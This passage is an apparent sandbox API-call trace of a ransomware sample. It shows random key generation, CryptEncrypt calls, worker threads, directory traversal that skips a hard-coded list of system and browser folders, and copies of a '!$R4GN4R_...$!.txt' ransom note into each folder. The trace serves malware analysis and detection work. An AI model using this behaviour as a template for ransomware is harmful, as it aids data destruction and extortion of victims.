pbBuffer=0x5d3a0f4) returned 1 [0168.044] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0168.044] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0168.047] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3557188) returned 1 [0168.047] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0168.047] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0168.048] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0168.051] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x3556cc0) returned 1 [0168.052] CryptGenRandom (in: hProv=0x3556cc0, dwLen=0x20, pbBuffer=0x5d3a11c | out: pbBuffer=0x5d3a11c) returned 1 [0168.052] CryptReleaseContext (hProv=0x3556cc0, dwFlags=0x0) returned 1 [0168.052] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0168.055] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556990) returned 1 [0168.056] CryptGenRandom (in: hProv=0x3556990, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0168.056] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0168.056] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0168.059] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3a13c*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d3a13c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.060] GetLastError () returned 0x80090016 [0168.060] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3a23c*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d3a23c*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.060] GetLastError () returned 0x80090016 [0168.060] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d2d1d0, dwCreationFlags=0x0, lpThreadId=0x5cfdd88 | out: lpThreadId=0x5cfdd88*=0xcb8) returned 0x3b4 [0168.061] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd63c*=0x3557188) returned 1 [0168.063] CryptGenRandom (in: hProv=0x3557188, dwLen=0x28, pbBuffer=0x5d4726c | out: pbBuffer=0x5d4726c) returned 1 [0168.063] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0168.063] CryptAcquireContextW (in: phProv=0x5cfd63c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd63c*=0x0) returned 0 [0168.067] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd638*=0x3556e58) returned 1 [0168.068] CryptGenRandom (in: hProv=0x3556e58, dwLen=0x40, pbBuffer=0x5cfd5f8 | out: pbBuffer=0x5cfd5f8) returned 1 [0168.068] CryptReleaseContext (hProv=0x3556e58, dwFlags=0x0) returned 1 [0168.068] CryptAcquireContextW (in: phProv=0x5cfd638, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd638*=0x0) returned 0 [0168.292] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd634*=0x35567f8) returned 1 [0168.293] CryptGenRandom (in: hProv=0x35567f8, dwLen=0x20, pbBuffer=0x5d47294 | out: pbBuffer=0x5d47294) returned 1 [0168.293] CryptReleaseContext (hProv=0x35567f8, dwFlags=0x0) returned 1 [0168.293] CryptAcquireContextW (in: phProv=0x5cfd634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd634*=0x0) returned 0 [0168.298] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5cfd630*=0x3556b28) returned 1 [0168.299] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5cfd5f0 | out: pbBuffer=0x5cfd5f0) returned 1 [0168.299] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0168.299] CryptAcquireContextW (in: phProv=0x5cfd630, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5cfd630*=0x0) returned 0 [0168.303] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d472b4*, pdwDataLen=0x5cfe340*=0x28, dwBufLen=0x190 | out: pbData=0x5d472b4*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.303] GetLastError () returned 0x80090016 [0168.303] CryptEncrypt (in: hKey=0x3547d80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d473b4*, pdwDataLen=0x5cfe340*=0x20, dwBufLen=0x140 | out: pbData=0x5d473b4*, pdwDataLen=0x5cfe340*=0x100) returned 1 [0168.304] GetLastError () returned 0x80090016 [0168.304] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x5d3a348, dwCreationFlags=0x0, lpThreadId=0x5cfdd8c | out: lpThreadId=0x5cfdd8c*=0x2bc) returned 0x384 [0168.304] WaitForMultipleObjects (nCount=0x4, lpHandles=0x5cfe0d0*=0x3d4, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0168.657] GetProcessHeap () returned 0x3520000 [0168.657] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x357e3a8 | out: hHeap=0x3520000) returned 1 [0168.657] CloseHandle (hObject=0x3d4) returned 1 [0168.658] GetProcessHeap () returned 0x3520000 [0168.658] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3606430 | out: hHeap=0x3520000) returned 1 [0168.658] CloseHandle (hObject=0x3c8) returned 1 [0168.658] GetProcessHeap () returned 0x3520000 [0168.658] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d20058 | out: hHeap=0x3520000) returned 1 [0168.661] CloseHandle (hObject=0x3b4) returned 1 [0168.661] GetProcessHeap () returned 0x3520000 [0168.661] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d2d1d0 | out: hHeap=0x3520000) returned 1 [0168.661] CloseHandle (hObject=0x384) returned 1 [0168.661] GetProcessHeap () returned 0x3520000 [0168.661] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x5d3a348 | out: hHeap=0x3520000) returned 1 [0168.664] FindClose (in: hFindFile=0x3547f00 | out: hFindFile=0x3547f00) returned 1 [0168.666] FindNextFileW (in: hFindFile=0x3548140, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0168.666] FindClose (in: hFindFile=0x3548140 | out: hFindFile=0x3548140) returned 1 [0168.669] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfeb8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfeb8c) returned 0x3548280 [0168.669] FindNextFileW (in: hFindFile=0x3548280, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xefa8f70f, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xefa8f70f, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.672] FindNextFileW (in: hFindFile=0x3548280, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa8e387, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xefa8e387, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0168.672] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\$GetCurrent\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe778, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\$GetCurrent\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x16 [0168.672] lstrcpyW (in: lpString1=0x5cfe79e, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0168.672] PathFindExtensionW (pszPath="\\\\?\\C:\\$GetCurrent\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0168.672] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0168.672] FindNextFileW (in: hFindFile=0x3548280, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x542c8aac, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0xf11eacb4, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf11eacb4, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Logs", cAlternateFileName="")) returned 1 [0168.672] FindNextFileW (in: hFindFile=0x3548280, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0xf1c7a07e, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf1c7a07e, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0168.672] FindNextFileW (in: hFindFile=0x3548280, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0xf1c7a07e, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf1c7a07e, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0168.672] FindClose (in: hFindFile=0x3548280 | out: hFindFile=0x3548280) returned 1 [0168.672] FindNextFileW (in: hFindFile=0x3548080, lpFindFileData=0x5cff898 | out: lpFindFileData=0x5cff898*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0168.672] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Windows.old") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Tor browser") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Internet Explorer") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Google") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Opera") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Opera Software") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Mozilla") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="Mozilla Firefox") returned -1 [0168.673] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$Recycle.Bin") returned 0 [0168.673] FindNextFileW (in: hFindFile=0x3548080, lpFindFileData=0x5cff898 | out: lpFindFileData=0x5cff898*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="")) returned 1 [0168.673] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".") returned -1 [0168.673] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="..") returned -1 [0168.673] FindNextFileW (in: hFindFile=0x3548080, lpFindFileData=0x5cff898 | out: lpFindFileData=0x5cff898*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="")) returned 1 [0168.673] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0168.673] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0168.673] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Windows") returned -1 [0168.673] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Windows.old") returned -1 [0168.673] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Tor browser") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Internet Explorer") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Google") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Opera") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Opera Software") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Mozilla") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="Mozilla Firefox") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="$Recycle.Bin") returned 1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="ProgramData") returned -1 [0168.674] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="All Users") returned -1 [0168.674] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\*.*", nBufferLength=0x104, lpBuffer=0x5cff690, lpFilePart=0x5cffd50 | out: lpBuffer="\\\\?\\C:\\*.*", lpFilePart=0x5cffd50*="*.*") returned 0xa [0168.674] lstrcpyW (in: lpString1=0x5cff69e, lpString2="588bce7c90097ed212" | out: lpString1="588bce7c90097ed212") returned="588bce7c90097ed212" [0168.674] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\") returned="\\\\?\\C:\\588bce7c90097ed212\\" [0168.674] lstrcpyW (in: lpString1=0x5cff484, lpString2="\\\\?\\C:\\588bce7c90097ed212\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\") returned="\\\\?\\C:\\588bce7c90097ed212\\" [0168.674] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\!$R4GN4R_B8CF767A$!.txt" [0168.674] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0168.680] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\*.*" [0168.680] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe570, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0168.680] lstrcpyW (in: lpString1=0x5cfe368, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0168.680] lstrcpyW (in: lpString1=0x5cfe5a4, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0168.680] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfeb8c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfeb8c) returned 0x3547bc0 [0168.680] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0168.680] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf74cd515, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf1e1c4ea, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.681] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0168.681] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0168.681] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1e1c4ea, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf1e1c4ea, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0168.681] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0168.681] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0168.681] FindNextFileW (in: hFindFile=0x3547bc0, lpFindFileData=0x5cfeb8c | out: lpFindFileData=0x5cfeb8c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1025", cAlternateFileName="")) returned 1 [0168.681] lstrcmpiW (lpString1="1025", lpString2=".") returned 1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="..") returned 1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Windows") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Windows.old") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Tor browser") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Internet Explorer") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Google") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Opera") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Opera Software") returned -1 [0168.681] lstrcmpiW (lpString1="1025", lpString2="Mozilla") returned -1 [0168.682] lstrcmpiW (lpString1="1025", lpString2="Mozilla Firefox") returned -1 [0168.682] lstrcmpiW (lpString1="1025", lpString2="$Recycle.Bin") returned 1 [0168.682] lstrcmpiW (lpString1="1025", lpString2="ProgramData") returned -1 [0168.682] lstrcmpiW (lpString1="1025", lpString2="All Users") returned -1 [0168.682] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\*.*", nBufferLength=0x104, lpBuffer=0x5cfe984, lpFilePart=0x5cff044 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\*.*", lpFilePart=0x5cff044*="*.*") returned 0x1d [0168.682] lstrcpyW (in: lpString1=0x5cfe9b8, lpString2="1025" | out: lpString1="1025") returned="1025" [0168.682] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025", lpString2="\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\" [0168.682] lstrcpyW (in: lpString1=0x5cfe778, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1025\\" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\" [0168.682] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\!$R4GN4R_B8CF767A$!.txt" [0168.682] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\588bce7c90097ed212\\1025\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 1 [0168.690] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\", lpString2="*.*" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*") returned="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*" [0168.690] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", nBufferLength=0x104, lpBuffer=0x5cfd864, lpFilePart=0x5cfe338 | out: lpBuffer="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", lpFilePart=0x5cfe338*="*.*") returned 0x22 [0168.690] lstrcpyW (in: lpString1=0x5cfd65c, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0168.690] lstrcpyW (in: lpString1=0x5cfd8a2, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0168.690] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1025\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cfde80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cfde80) returned 0x3547cc0 [0168.690] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0168.690] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37db23a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf1e35ed3, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0168.692] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0168.692] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0168.692] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1e2d70e, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xf1e2d70e, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0168.692] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0168.692] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0168.692] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1d8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0168.692] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0168.692] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0168.692] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x121e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="")) returned 1 [0168.692] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0168.692] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0168.692] FindNextFileW (in: hFindFile=0x3547cc0, lpFindFileData=0x5cfde80 | out: lpFindFileData=0x5cfde80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe40ff600, 